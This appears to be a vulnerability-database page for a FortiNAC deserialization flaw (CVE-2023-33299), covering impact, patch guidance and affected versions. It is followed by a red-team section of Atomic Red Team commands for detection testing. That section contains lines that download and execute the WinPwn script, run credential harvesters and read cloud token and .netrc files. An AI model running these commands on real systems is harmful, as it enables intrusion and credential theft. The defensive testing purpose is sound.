CVE-2023-33299
Overview
This vulnerability is a deserialization flaw in Fortinet FortiNAC affecting versions below 7.2.1, 9.4.3, 9.2.8, and all earlier 8.x releases. The root cause lies in the insecure handling of untrusted serialized data received via the inter-server communication port. The affected component improperly deserializes crafted input, enabling manipulation of internal object states during inter-server messaging.
Vulnerability Description
A deserialization of untrusted data in Fortinet FortiNAC below 7.2.1, below 9.4.3, below 9.2.8 and all earlier versions of 8.x allows attacker to execute unauthorized code or commands via specifically crafted request on inter-server communication port. Note FortiNAC versions 8.x will not be fixed.
Impact
An unauthenticated attacker with network access to the inter-server communication port can execute arbitrary code or commands on vulnerable FortiNAC instances. This enables complete system compromise, including unauthorized control over device operations and potential lateral movement within the network. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms remote exploitation without authentication or user interaction, allowing high-impact confidentiality, integrity, and availability breaches.
Solution
Fortinet recommends upgrading FortiNAC to versions 7.2.1, 9.4.3, or 9.2.8 and later where the vulnerability is addressed. Versions in the 8.x series will not be fixed. Detailed patch instructions and advisory information are available in Fortinet's PSIRT advisory FG-IR-23-074 at https://fortiguard.com/psirt/FG-IR-23-074. Users should prioritize upgrades to supported fixed versions to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Fortinet FortiNAC is rooted in the deserialization of untrusted data, which occurs when the application improperly processes serialized data from an untrusted source. This flaw is particularly critical as it allows an attacker to craft malicious requests that can be sent over inter-server communication ports. When the affected versions of FortiNAC receive these specially crafted requests, they may execute unauthorized code or commands, leading to a potential compromise of the system. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating that it poses a significant risk to the integrity and confidentiality of the affected systems.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with network access to the inter-server communication port could leverage this flaw to send maliciously crafted data. This could be achieved through techniques such as man-in-the-middle attacks or by exploiting other vulnerabilities in the network to gain access to the communication channels. Once the attacker successfully sends the crafted request, they can execute arbitrary code, which may allow them to manipulate the FortiNAC system, exfiltrate sensitive data, or pivot to other systems within the network. The potential for remote code execution makes this vulnerability particularly dangerous, as it could lead to widespread system compromise.
The real-world impact of this vulnerability is substantial, especially for organizations relying on FortiNAC for network access control and security management. Successful exploitation could result in unauthorized access to sensitive data, disruption of services, or even complete system takeover. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, particularly if sensitive customer data is compromised. Organizations may also face increased scrutiny from stakeholders and regulatory bodies, leading to a loss of trust and potential legal ramifications. The fact that certain versions of FortiNAC will not receive a fix further exacerbates the risk, as organizations using these versions remain vulnerable indefinitely.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly monitoring network traffic for unusual patterns or unauthorized access attempts can help identify potential exploitation attempts. Employing intrusion detection systems (IDS) and intrusion prevention systems (IPS) can provide additional layers of security by alerting administrators to suspicious activities. Furthermore, organizations should prioritize patch management, ensuring that they are running the latest supported versions of FortiNAC. For those using unsupported versions, immediate steps should be taken to isolate vulnerable systems from the network and assess the feasibility of upgrading to a secure version. Additionally, implementing strict access controls and network segmentation can help limit the potential impact of an exploit.
In conclusion, the deserialization vulnerability in Fortinet FortiNAC represents a critical security risk that organizations must address proactively. The potential for remote code execution through crafted requests poses significant threats to system integrity and data confidentiality. By understanding the technical details of the vulnerability, recognizing the various attack vectors, assessing the real-world impact, and employing effective detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities in the future. It is essential for organizations to remain vigilant and responsive to emerging threats, ensuring that their security posture is robust and resilient against exploitation.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | 7.2.0 |
cpe:2.3:a:fortinet:fortinac:7.2.0:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | 7.2.1 |
cpe:2.3:a:fortinet:fortinac:7.2.1:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | 8.3.7 |
cpe:2.3:a:fortinet:fortinac:8.3.7:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | 9.4.0 |
cpe:2.3:a:fortinet:fortinac:9.4.0:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | 9.4.1 |
cpe:2.3:a:fortinet:fortinac:9.4.1:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | 9.4.2 |
cpe:2.3:a:fortinet:fortinac:9.4.2:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
60%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-33299 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-23-074 |